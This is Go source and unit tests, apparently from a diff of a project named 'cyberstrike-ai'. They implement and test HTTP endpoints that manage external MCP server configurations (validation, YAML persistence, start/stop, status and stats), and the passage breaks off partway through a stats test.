// GetExternalMCPs 获取所有外部MCP配置
|
||||
func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
|
||||
configs := h.manager.GetConfigs()
|
||||
|
||||
// 获取所有外部MCP的工具数量
|
||||
toolCounts := h.manager.GetToolCounts()
|
||||
|
||||
// 转换为响应格式
|
||||
result := make(map[string]ExternalMCPResponse)
|
||||
for name, cfg := range configs {
|
||||
client, exists := h.manager.GetClient(name)
|
||||
status := "disconnected"
|
||||
if exists {
|
||||
status = client.GetStatus()
|
||||
} else if h.isEnabled(cfg) {
|
||||
status = "disconnected"
|
||||
} else {
|
||||
status = "disabled"
|
||||
}
|
||||
|
||||
toolCount := toolCounts[name]
|
||||
errorMsg := externalMCPStatusError(h.manager, name, status)
|
||||
|
||||
result[name] = ExternalMCPResponse{
|
||||
Config: cfg,
|
||||
Status: status,
|
||||
ToolCount: toolCount,
|
||||
Error: errorMsg,
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"servers": result,
|
||||
"stats": h.manager.GetStats(),
|
||||
})
|
||||
}
|
||||
|
||||
// GetExternalMCP 获取单个外部MCP配置
|
||||
func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
|
||||
name := c.Param("name")
|
||||
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
|
||||
configs := h.manager.GetConfigs()
|
||||
cfg, exists := configs[name]
|
||||
if !exists {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "外部MCP配置不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
client, clientExists := h.manager.GetClient(name)
|
||||
status := "disconnected"
|
||||
if clientExists {
|
||||
status = client.GetStatus()
|
||||
} else if h.isEnabled(cfg) {
|
||||
status = "disconnected"
|
||||
} else {
|
||||
status = "disabled"
|
||||
}
|
||||
|
||||
// 获取工具数量
|
||||
toolCount := 0
|
||||
if clientExists && client.IsConnected() {
|
||||
if count, err := h.manager.GetToolCount(name); err == nil {
|
||||
toolCount = count
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, ExternalMCPResponse{
|
||||
Config: cfg,
|
||||
Status: status,
|
||||
ToolCount: toolCount,
|
||||
Error: externalMCPStatusError(h.manager, name, status),
|
||||
})
|
||||
}
|
||||
|
||||
// externalMCPStatusError 在 error/disconnected 状态下返回最近错误(含断连原因)。
|
||||
func externalMCPStatusError(manager *mcp.ExternalMCPManager, name, status string) string {
|
||||
if status != "error" && status != "disconnected" {
|
||||
return ""
|
||||
}
|
||||
return manager.GetError(name)
|
||||
}
|
||||
|
||||
// AddOrUpdateExternalMCP 添加或更新外部MCP配置
|
||||
func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
|
||||
var req AddOrUpdateExternalMCPRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
name := c.Param("name")
|
||||
if name == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
// 验证配置
|
||||
if err := h.validateConfig(req.Config); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
// 添加或更新配置
|
||||
if err := h.manager.AddOrUpdateConfig(name, req.Config); err != nil {
|
||||
h.logger.Error("添加或更新外部MCP配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "添加或更新配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 更新内存中的配置
|
||||
if h.config.ExternalMCP.Servers == nil {
|
||||
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
|
||||
}
|
||||
|
||||
cfg := req.Config
|
||||
|
||||
// 官方 disabled 字段 → ExternalMCPEnable 取反
|
||||
if cfg.Disabled {
|
||||
cfg.ExternalMCPEnable = false
|
||||
} else if !cfg.ExternalMCPEnable {
|
||||
// 用户未显式设置 external_mcp_enable,官方配置默认就是启用的
|
||||
cfg.ExternalMCPEnable = true
|
||||
}
|
||||
|
||||
// 展开 ${VAR} 环境变量
|
||||
config.ExpandConfigEnv(&cfg)
|
||||
|
||||
h.config.ExternalMCP.Servers[name] = cfg
|
||||
|
||||
// 保存到配置文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("外部MCP配置已更新", zap.String("name", name))
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Category: "external_mcp",
|
||||
Action: "upsert",
|
||||
Result: "success",
|
||||
ResourceType: "external_mcp",
|
||||
ResourceID: name,
|
||||
Message: "更新外部 MCP 配置",
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "配置已更新"})
|
||||
}
|
||||
|
||||
// DeleteExternalMCP 删除外部MCP配置
|
||||
func (h *ExternalMCPHandler) DeleteExternalMCP(c *gin.Context) {
|
||||
name := c.Param("name")
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
// 移除配置
|
||||
if err := h.manager.RemoveConfig(name); err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "配置不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 从内存配置中删除
|
||||
if h.config.ExternalMCP.Servers != nil {
|
||||
delete(h.config.ExternalMCP.Servers, name)
|
||||
}
|
||||
|
||||
// 保存到配置文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("外部MCP配置已删除", zap.String("name", name))
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Category: "external_mcp",
|
||||
Action: "delete",
|
||||
Result: "success",
|
||||
ResourceType: "external_mcp",
|
||||
ResourceID: name,
|
||||
Message: "删除外部 MCP 配置",
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "配置已删除"})
|
||||
}
|
||||
|
||||
// StartExternalMCP 启动外部MCP
|
||||
func (h *ExternalMCPHandler) StartExternalMCP(c *gin.Context) {
|
||||
name := c.Param("name")
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
// 更新配置为启用
|
||||
if h.config.ExternalMCP.Servers == nil {
|
||||
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
|
||||
}
|
||||
cfg := h.config.ExternalMCP.Servers[name]
|
||||
cfg.ExternalMCPEnable = true
|
||||
h.config.ExternalMCP.Servers[name] = cfg
|
||||
|
||||
// 保存到配置文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 启动客户端(立即创建客户端并设置状态为connecting,实际连接在后台进行)
|
||||
h.logger.Info("开始启动外部MCP", zap.String("name", name))
|
||||
if err := h.manager.StartClient(name); err != nil {
|
||||
h.logger.Error("启动外部MCP失败", zap.String("name", name), zap.Error(err))
|
||||
c.JSON(http.StatusBadRequest, gin.H{
|
||||
"error": err.Error(),
|
||||
"status": "error",
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
// 获取客户端状态(应该是connecting)
|
||||
client, exists := h.manager.GetClient(name)
|
||||
status := "connecting"
|
||||
if exists {
|
||||
status = client.GetStatus()
|
||||
}
|
||||
|
||||
// 立即返回,不等待连接完成
|
||||
// 客户端会在后台异步连接,用户可以通过状态查询接口查看连接状态
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "外部MCP启动请求已提交,正在后台连接中",
|
||||
"status": status,
|
||||
})
|
||||
}
|
||||
|
||||
// StopExternalMCP 停止外部MCP
|
||||
func (h *ExternalMCPHandler) StopExternalMCP(c *gin.Context) {
|
||||
name := c.Param("name")
|
||||
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
|
||||
// 停止客户端
|
||||
if err := h.manager.StopClient(name); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 更新配置
|
||||
if h.config.ExternalMCP.Servers == nil {
|
||||
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
|
||||
}
|
||||
cfg := h.config.ExternalMCP.Servers[name]
|
||||
cfg.ExternalMCPEnable = false
|
||||
h.config.ExternalMCP.Servers[name] = cfg
|
||||
|
||||
// 保存到配置文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("外部MCP已停止", zap.String("name", name))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "外部MCP已停止"})
|
||||
}
|
||||
|
||||
// GetExternalMCPStats 获取统计信息
|
||||
func (h *ExternalMCPHandler) GetExternalMCPStats(c *gin.Context) {
|
||||
stats := h.manager.GetStats()
|
||||
c.JSON(http.StatusOK, stats)
|
||||
}
|
||||
|
||||
// validateConfig 验证配置(同时支持官方 type 字段和旧版 transport 字段)
|
||||
func (h *ExternalMCPHandler) validateConfig(cfg config.ExternalMCPServerConfig) error {
|
||||
transport := cfg.GetTransportType()
|
||||
if transport == "" {
|
||||
return fmt.Errorf("需要指定 command(stdio模式)或 url + type(http/sse模式)")
|
||||
}
|
||||
|
||||
switch transport {
|
||||
case "http":
|
||||
if cfg.URL == "" {
|
||||
return fmt.Errorf("HTTP模式需要 url")
|
||||
}
|
||||
case "stdio":
|
||||
if cfg.Command == "" {
|
||||
return fmt.Errorf("stdio模式需要 command")
|
||||
}
|
||||
case "sse":
|
||||
if cfg.URL == "" {
|
||||
return fmt.Errorf("SSE模式需要 url")
|
||||
}
|
||||
default:
|
||||
return fmt.Errorf("不支持的传输模式: %s,支持的模式: http, stdio, sse", transport)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// isEnabled 检查是否启用
|
||||
func (h *ExternalMCPHandler) isEnabled(cfg config.ExternalMCPServerConfig) bool {
|
||||
return cfg.ExternalMCPEnable
|
||||
}
|
||||
|
||||
// saveConfig 保存配置到文件
|
||||
func (h *ExternalMCPHandler) saveConfig() error {
|
||||
data, err := os.ReadFile(h.configPath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("读取配置文件失败: %w", err)
|
||||
}
|
||||
|
||||
if err := os.WriteFile(h.configPath+".backup", data, 0644); err != nil {
|
||||
h.logger.Warn("创建配置备份失败", zap.Error(err))
|
||||
}
|
||||
|
||||
root, err := loadYAMLDocument(h.configPath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("解析配置文件失败: %w", err)
|
||||
}
|
||||
|
||||
updateExternalMCPConfig(root, h.config.ExternalMCP)
|
||||
|
||||
if err := writeYAMLDocument(h.configPath, root); err != nil {
|
||||
return fmt.Errorf("保存配置文件失败: %w", err)
|
||||
}
|
||||
|
||||
h.logger.Info("配置已保存", zap.String("path", h.configPath))
|
||||
return nil
|
||||
}
|
||||
|
||||
// updateExternalMCPConfig 更新外部MCP配置
|
||||
func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig) {
|
||||
root := doc.Content[0]
|
||||
externalMCPNode := ensureMap(root, "external_mcp")
|
||||
serversNode := ensureMap(externalMCPNode, "servers")
|
||||
|
||||
// 清空现有服务器配置
|
||||
serversNode.Content = nil
|
||||
|
||||
// 添加新的服务器配置
|
||||
for name, serverCfg := range cfg.Servers {
|
||||
nameNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: name}
|
||||
serverNode := &yaml.Node{Kind: yaml.MappingNode, Tag: "!!map"}
|
||||
serversNode.Content = append(serversNode.Content, nameNode, serverNode)
|
||||
|
||||
// type(官方 MCP 传输类型)
|
||||
effectiveType := serverCfg.GetTransportType()
|
||||
if effectiveType != "" && effectiveType != "stdio" {
|
||||
// stdio 可省略(有 command 时自动推断)
|
||||
setStringInMap(serverNode, "type", effectiveType)
|
||||
}
|
||||
if serverCfg.Command != "" {
|
||||
setStringInMap(serverNode, "command", serverCfg.Command)
|
||||
}
|
||||
if len(serverCfg.Args) > 0 {
|
||||
setStringArrayInMap(serverNode, "args", serverCfg.Args)
|
||||
}
|
||||
if serverCfg.Env != nil && len(serverCfg.Env) > 0 {
|
||||
envNode := ensureMap(serverNode, "env")
|
||||
for envKey, envValue := range serverCfg.Env {
|
||||
setStringInMap(envNode, envKey, envValue)
|
||||
}
|
||||
}
|
||||
if serverCfg.URL != "" {
|
||||
setStringInMap(serverNode, "url", serverCfg.URL)
|
||||
}
|
||||
if serverCfg.Headers != nil && len(serverCfg.Headers) > 0 {
|
||||
headersNode := ensureMap(serverNode, "headers")
|
||||
for k, v := range serverCfg.Headers {
|
||||
setStringInMap(headersNode, k, v)
|
||||
}
|
||||
}
|
||||
if serverCfg.Description != "" {
|
||||
setStringInMap(serverNode, "description", serverCfg.Description)
|
||||
}
|
||||
if serverCfg.Timeout > 0 {
|
||||
setIntInMap(serverNode, "timeout", serverCfg.Timeout)
|
||||
}
|
||||
// 官方标准字段
|
||||
if serverCfg.Disabled {
|
||||
setBoolInMap(serverNode, "disabled", true)
|
||||
}
|
||||
if len(serverCfg.AutoApprove) > 0 {
|
||||
setStringArrayInMap(serverNode, "autoApprove", serverCfg.AutoApprove)
|
||||
}
|
||||
|
||||
// SDK 高级配置
|
||||
if serverCfg.MaxRetries > 0 {
|
||||
setIntInMap(serverNode, "max_retries", serverCfg.MaxRetries)
|
||||
}
|
||||
if serverCfg.TerminateDuration > 0 {
|
||||
setIntInMap(serverNode, "terminate_duration", serverCfg.TerminateDuration)
|
||||
}
|
||||
if serverCfg.KeepAlive > 0 {
|
||||
setIntInMap(serverNode, "keep_alive", serverCfg.KeepAlive)
|
||||
}
|
||||
|
||||
setBoolInMap(serverNode, "external_mcp_enable", serverCfg.ExternalMCPEnable)
|
||||
if serverCfg.ToolEnabled != nil && len(serverCfg.ToolEnabled) > 0 {
|
||||
toolEnabledNode := ensureMap(serverNode, "tool_enabled")
|
||||
for toolName, enabled := range serverCfg.ToolEnabled {
|
||||
setBoolInMap(toolEnabledNode, toolName, enabled)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// setStringArrayInMap 设置字符串数组
|
||||
func setStringArrayInMap(mapNode *yaml.Node, key string, values []string) {
|
||||
_, valueNode := ensureKeyValue(mapNode, key)
|
||||
valueNode.Kind = yaml.SequenceNode
|
||||
valueNode.Tag = "!!seq"
|
||||
valueNode.Content = nil
|
||||
for _, v := range values {
|
||||
itemNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: v}
|
||||
valueNode.Content = append(valueNode.Content, itemNode)
|
||||
}
|
||||
}
|
||||
|
||||
// AddOrUpdateExternalMCPRequest 添加或更新外部MCP请求
|
||||
type AddOrUpdateExternalMCPRequest struct {
|
||||
Config config.ExternalMCPServerConfig `json:"config"`
|
||||
}
|
||||
|
||||
// ExternalMCPResponse 外部MCP响应
|
||||
type ExternalMCPResponse struct {
|
||||
Config config.ExternalMCPServerConfig `json:"config"`
|
||||
Status string `json:"status"` // "connected", "disconnected", "disabled", "error", "connecting"
|
||||
ToolCount int `json:"tool_count"` // 工具数量
|
||||
Error string `json:"error,omitempty"` // 错误信息(仅在status为error时存在)
|
||||
}
|
||||
@@ -0,0 +1,518 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"os"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
func setupTestRouter() (*gin.Engine, *ExternalMCPHandler, string) {
|
||||
gin.SetMode(gin.TestMode)
|
||||
router := gin.New()
|
||||
|
||||
// 创建临时配置文件
|
||||
tmpFile, err := os.CreateTemp("", "test-config-*.yaml")
|
||||
if err != nil {
|
||||
panic(err)
|
||||
}
|
||||
tmpFile.WriteString("server:\n host: 0.0.0.0\n port: 8080\n")
|
||||
tmpFile.Close()
|
||||
configPath := tmpFile.Name()
|
||||
|
||||
logger := zap.NewNop()
|
||||
manager := mcp.NewExternalMCPManager(logger)
|
||||
cfg := &config.Config{
|
||||
ExternalMCP: config.ExternalMCPConfig{
|
||||
Servers: make(map[string]config.ExternalMCPServerConfig),
|
||||
},
|
||||
}
|
||||
|
||||
handler := NewExternalMCPHandler(manager, cfg, configPath, logger)
|
||||
|
||||
api := router.Group("/api")
|
||||
api.GET("/external-mcp", handler.GetExternalMCPs)
|
||||
api.GET("/external-mcp/stats", handler.GetExternalMCPStats)
|
||||
api.GET("/external-mcp/:name", handler.GetExternalMCP)
|
||||
api.PUT("/external-mcp/:name", handler.AddOrUpdateExternalMCP)
|
||||
api.DELETE("/external-mcp/:name", handler.DeleteExternalMCP)
|
||||
api.POST("/external-mcp/:name/start", handler.StartExternalMCP)
|
||||
api.POST("/external-mcp/:name/stop", handler.StopExternalMCP)
|
||||
|
||||
return router, handler, configPath
|
||||
}
|
||||
|
||||
func cleanupTestConfig(configPath string) {
|
||||
os.Remove(configPath)
|
||||
os.Remove(configPath + ".backup")
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_Stdio(t *testing.T) {
|
||||
router, _, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
// 测试添加stdio模式的配置(官方格式:有 command 时 type 可省略)
|
||||
configJSON := `{
|
||||
"command": "python3",
|
||||
"args": ["/path/to/script.py", "--server", "http://example.com"],
|
||||
"description": "Test stdio MCP",
|
||||
"timeout": 300,
|
||||
"external_mcp_enable": true
|
||||
}`
|
||||
|
||||
var configObj config.ExternalMCPServerConfig
|
||||
if err := json.Unmarshal([]byte(configJSON), &configObj); err != nil {
|
||||
t.Fatalf("解析配置JSON失败: %v", err)
|
||||
}
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: configObj,
|
||||
}
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test-stdio", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
// 验证配置已添加
|
||||
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-stdio", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
if w2.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
|
||||
var response ExternalMCPResponse
|
||||
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
if response.Config.Command != "python3" {
|
||||
t.Errorf("期望command为python3,实际%s", response.Config.Command)
|
||||
}
|
||||
if len(response.Config.Args) != 3 {
|
||||
t.Errorf("期望args长度为3,实际%d", len(response.Config.Args))
|
||||
}
|
||||
if response.Config.Description != "Test stdio MCP" {
|
||||
t.Errorf("期望description为'Test stdio MCP',实际%s", response.Config.Description)
|
||||
}
|
||||
if response.Config.Timeout != 300 {
|
||||
t.Errorf("期望timeout为300,实际%d", response.Config.Timeout)
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_HTTP(t *testing.T) {
|
||||
router, _, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
// 测试添加HTTP模式的配置(使用官方 type 字段)
|
||||
configJSON := `{
|
||||
"type": "http",
|
||||
"url": "http://127.0.0.1:8081/mcp",
|
||||
"external_mcp_enable": true
|
||||
}`
|
||||
|
||||
var configObj config.ExternalMCPServerConfig
|
||||
if err := json.Unmarshal([]byte(configJSON), &configObj); err != nil {
|
||||
t.Fatalf("解析配置JSON失败: %v", err)
|
||||
}
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: configObj,
|
||||
}
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test-http", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
// 验证配置已添加
|
||||
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-http", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
if w2.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
|
||||
var response ExternalMCPResponse
|
||||
if err := json.Unmarshal(w2.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
if response.Config.Type != "http" {
|
||||
t.Errorf("期望type为http,实际%s", response.Config.Type)
|
||||
}
|
||||
if response.Config.URL != "http://127.0.0.1:8081/mcp" {
|
||||
t.Errorf("期望url为'http://127.0.0.1:8081/mcp',实际%s", response.Config.URL)
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_AddOrUpdateExternalMCP_InvalidConfig(t *testing.T) {
|
||||
router, _, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
testCases := []struct {
|
||||
name string
|
||||
configJSON string
|
||||
expectedErr string
|
||||
}{
|
||||
{
|
||||
name: "缺少command和url",
|
||||
configJSON: `{"external_mcp_enable": true}`,
|
||||
expectedErr: "需要指定 command(stdio模式)或 url + type(http/sse模式)",
|
||||
},
|
||||
{
|
||||
name: "stdio模式缺少command",
|
||||
configJSON: `{"args": ["test"], "external_mcp_enable": true}`,
|
||||
expectedErr: "stdio模式需要command",
|
||||
},
|
||||
{
|
||||
name: "http模式缺少url",
|
||||
configJSON: `{"type": "http", "external_mcp_enable": true}`,
|
||||
expectedErr: "HTTP模式需要 url",
|
||||
},
|
||||
{
|
||||
name: "无效的type",
|
||||
configJSON: `{"type": "invalid", "external_mcp_enable": true}`,
|
||||
expectedErr: "不支持的传输模式",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tc := range testCases {
|
||||
t.Run(tc.name, func(t *testing.T) {
|
||||
var configObj config.ExternalMCPServerConfig
|
||||
if err := json.Unmarshal([]byte(tc.configJSON), &configObj); err != nil {
|
||||
t.Fatalf("解析配置JSON失败: %v", err)
|
||||
}
|
||||
|
||||
reqBody := AddOrUpdateExternalMCPRequest{
|
||||
Config: configObj,
|
||||
}
|
||||
|
||||
body, _ := json.Marshal(reqBody)
|
||||
req := httptest.NewRequest("PUT", "/api/external-mcp/test-invalid", bytes.NewBuffer(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
w := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusBadRequest {
|
||||
t.Errorf("期望状态码400,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
var response map[string]interface{}
|
||||
if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
errorMsg := response["error"].(string)
|
||||
// 对于stdio模式缺少command的情况,错误信息可能略有不同
|
||||
if tc.name == "stdio模式缺少command" {
|
||||
if !strings.Contains(errorMsg, "stdio") && !strings.Contains(errorMsg, "command") {
|
||||
t.Errorf("期望错误信息包含'stdio'或'command',实际'%s'", errorMsg)
|
||||
}
|
||||
} else if !strings.Contains(errorMsg, tc.expectedErr) {
|
||||
t.Errorf("期望错误信息包含'%s',实际'%s'", tc.expectedErr, errorMsg)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
|
||||
router, handler, configPath := setupTestRouter()
|
||||
defer cleanupTestConfig(configPath)
|
||||
|
||||
// 先添加一个配置
|
||||
configObj := config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
ExternalMCPEnable: true,
|
||||
}
|
||||
handler.manager.AddOrUpdateConfig("test-delete", configObj)
|
||||
|
||||
// 删除配置
|
||||
req := httptest.NewRequest("DELETE", "/api/external-mcp/test-delete", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
// 验证配置已删除
|
||||
req2 := httptest.NewRequest("GET", "/api/external-mcp/test-delete", nil)
|
||||
w2 := httptest.NewRecorder()
|
||||
router.ServeHTTP(w2, req2)
|
||||
|
||||
if w2.Code != http.StatusNotFound {
|
||||
t.Errorf("期望状态码404,实际%d: %s", w2.Code, w2.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPStatusError(t *testing.T) {
|
||||
manager := mcp.NewExternalMCPManager(zap.NewNop())
|
||||
if got := externalMCPStatusError(manager, "x", "connected"); got != "" {
|
||||
t.Fatalf("connected status should not return error, got %q", got)
|
||||
}
|
||||
if got := externalMCPStatusError(manager, "x", "connecting"); got != "" {
|
||||
t.Fatalf("connecting status should not return error, got %q", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
|
||||
router, handler, _ := setupTestRouter()
|
||||
|
||||
// 添加多个配置
|
||||
handler.manager.AddOrUpdateConfig("test1", config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
ExternalMCPEnable: true,
|
||||
})
|
||||
handler.manager.AddOrUpdateConfig("test2", config.ExternalMCPServerConfig{
|
||||
URL: "http://127.0.0.1:8081/mcp",
|
||||
ExternalMCPEnable: false,
|
||||
})
|
||||
|
||||
req := httptest.NewRequest("GET", "/api/external-mcp", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
var response map[string]interface{}
|
||||
if err := json.Unmarshal(w.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
servers := response["servers"].(map[string]interface{})
|
||||
if len(servers) != 2 {
|
||||
t.Errorf("期望2个服务器,实际%d", len(servers))
|
||||
}
|
||||
if _, ok := servers["test1"]; !ok {
|
||||
t.Error("期望包含test1")
|
||||
}
|
||||
if _, ok := servers["test2"]; !ok {
|
||||
t.Error("期望包含test2")
|
||||
}
|
||||
|
||||
stats := response["stats"].(map[string]interface{})
|
||||
if int(stats["total"].(float64)) != 2 {
|
||||
t.Errorf("期望总数为2,实际%d", int(stats["total"].(float64)))
|
||||
}
|
||||
}
|
||||
|
||||
func TestExternalMCPHandler_GetExternalMCPStats(t *testing.T) {
|
||||
router, handler, _ := setupTestRouter()
|
||||
|
||||
// 添加配置
|
||||
handler.manager.AddOrUpdateConfig("enabled1", config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
ExternalMCPEnable: true,
|
||||
})
|
||||
handler.manager.AddOrUpdateConfig("enabled2", config.ExternalMCPServerConfig{
|
||||
URL: "http://127.0.0.1:8081/mcp",
|
||||
ExternalMCPEnable: true,
|
||||
})
|
||||
handler.manager.AddOrUpdateConfig("disabled1", config.ExternalMCPServerConfig{
|
||||
Command: "python3",
|
||||
})
|
||||
|
||||
req := httptest.NewRequest("GET", "/api/external-mcp/stats", nil)
|
||||
w := httptest.NewRecorder()
|
||||
router.ServeHTTP(w, req)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Fatalf("期望状态码200,实际%d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
|
||||
var stats map[string]interface{}
|
||||
if err := json.Unmarshal(w.Body.Bytes(), &stats); err != nil {
|
||||
t.Fatalf("解析响应失败: %v", err)
|
||||
}
|
||||
|
||||
if int(stats["total"].(float64)) != 3 {
|
||||
t.Errorf("期望总数为3,实际%d", int(stats["total"].(float64)))
|
||||
}
|
||||
if int(stats["enabled"].(float64)) != 2 {
|
||||
t.Errorf("期望启用数为2,实际%d", int(stats["enabled"].(float64)))
|
||||
}
|
||||
if int(stats["disabled"].(float64)) != 1 {
|
||||
